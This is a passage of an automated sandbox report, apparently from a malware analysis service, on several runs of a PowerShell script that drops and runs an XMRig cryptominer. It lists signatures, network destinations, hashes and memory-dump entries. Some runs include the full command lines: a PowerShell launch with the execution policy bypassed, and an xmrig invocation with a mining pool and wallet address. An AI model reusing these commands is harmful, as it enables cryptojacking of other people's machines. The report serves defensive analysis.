memory/528-101-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-102-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-103-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-104-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-105-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-106-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-107-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-108-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-109-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-110-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-111-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-112-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-113-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-114-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-115-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-116-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-117-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-118-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-119-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-120-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-121-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-122-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-123-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-124-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-125-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-126-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-127-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-128-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-129-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-130-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-131-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-132-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-133-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-134-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-135-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-136-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-137-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-138-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-139-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-140-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-141-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-142-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-143-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-144-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-145-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-146-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-147-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-148-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-149-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-150-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-151-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-152-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-153-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-154-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-155-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

memory/528-156-0x00007FF7892F0000-0x00007FF789F23000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 04:08

Platform

win11-20240508-en

Max time kernel

1793s

Max time network

1783s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 52.111.227.11:443 tcp

Files

memory/4880-0-0x00007FFB2CC93000-0x00007FFB2CC95000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vlvtaidh.byh.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4880-9-0x0000020A429A0000-0x0000020A429C2000-memory.dmp

memory/4880-10-0x00007FFB2CC90000-0x00007FFB2D752000-memory.dmp

memory/4880-11-0x00007FFB2CC90000-0x00007FFB2D752000-memory.dmp

memory/4880-12-0x00007FFB2CC90000-0x00007FFB2D752000-memory.dmp

memory/4880-14-0x0000020A42B80000-0x0000020A42B92000-memory.dmp

memory/4880-15-0x0000020A42B70000-0x0000020A42B7A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1704-46-0x0000019811A40000-0x0000019811A60000-memory.dmp

memory/1704-47-0x0000019811BB0000-0x0000019811BD0000-memory.dmp

memory/1704-48-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/4880-49-0x00007FFB2CC90000-0x00007FFB2D752000-memory.dmp

memory/4880-50-0x00007FFB2CC93000-0x00007FFB2CC95000-memory.dmp

memory/1704-52-0x0000019811BD0000-0x0000019811BF0000-memory.dmp

memory/1704-51-0x0000019811BF0000-0x0000019811C10000-memory.dmp

memory/1704-53-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-54-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-55-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-57-0x0000019811BD0000-0x0000019811BF0000-memory.dmp

memory/1704-56-0x0000019811BF0000-0x0000019811C10000-memory.dmp

memory/1704-58-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-59-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-60-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-61-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-62-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-63-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-64-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-65-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-66-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-67-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-68-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-69-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-70-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-71-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-72-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-73-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-74-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-75-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-76-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-77-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-78-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-79-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-80-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-81-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-82-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-83-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-84-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-85-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-86-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-87-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-88-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-89-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-90-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-91-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-92-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-93-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-94-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-95-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-96-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-97-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-98-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-99-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-100-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-101-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-102-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-103-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-104-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-105-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-106-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-107-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-108-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-109-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-110-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-111-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-112-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-113-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-114-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-115-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

memory/1704-116-0x00007FF63A130000-0x00007FF63AD63000-memory.dmp

Analysis: behavioral26

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 04:13

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1799s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 24.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/4448-4-0x00007FFA9C3B3000-0x00007FFA9C3B4000-memory.dmp

memory/4448-5-0x00000298B29C0000-0x00000298B29E2000-memory.dmp

memory/4448-8-0x00007FFA9C3B0000-0x00007FFA9CD9C000-memory.dmp

memory/4448-9-0x00000298B2AF0000-0x00000298B2B66000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pphytjkj.w5t.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4448-10-0x00007FFA9C3B0000-0x00007FFA9CD9C000-memory.dmp

memory/4448-25-0x00007FFA9C3B0000-0x00007FFA9CD9C000-memory.dmp

memory/4448-48-0x00000298B2940000-0x00000298B2952000-memory.dmp

memory/4448-61-0x00000298B2920000-0x00000298B292A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4484-90-0x000001C90A400000-0x000001C90A420000-memory.dmp

memory/4484-91-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-92-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4448-93-0x00007FFA9C3B3000-0x00007FFA9C3B4000-memory.dmp

memory/4448-94-0x00007FFA9C3B0000-0x00007FFA9CD9C000-memory.dmp

memory/4448-95-0x00007FFA9C3B0000-0x00007FFA9CD9C000-memory.dmp

memory/4484-96-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-97-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-98-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-99-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-100-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-101-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-102-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-103-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-104-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-105-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-106-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-107-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-108-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-109-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-110-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-111-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-112-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-113-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-114-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-115-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-116-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-117-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-118-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-119-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-120-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-121-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-122-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-123-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-124-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-125-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-126-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-127-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-128-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-129-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-130-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-131-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-132-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-133-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-134-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-135-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-136-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-137-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-138-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-139-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-140-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-141-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-142-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-143-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-144-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-145-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-146-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-147-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-148-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-149-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-150-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-151-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-152-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-153-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-154-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-155-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

memory/4484-156-0x00007FF6D0F80000-0x00007FF6D1BB3000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 04:19

Platform

win10v2004-20240508-en

Max time kernel

1792s

Max time network

1780s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
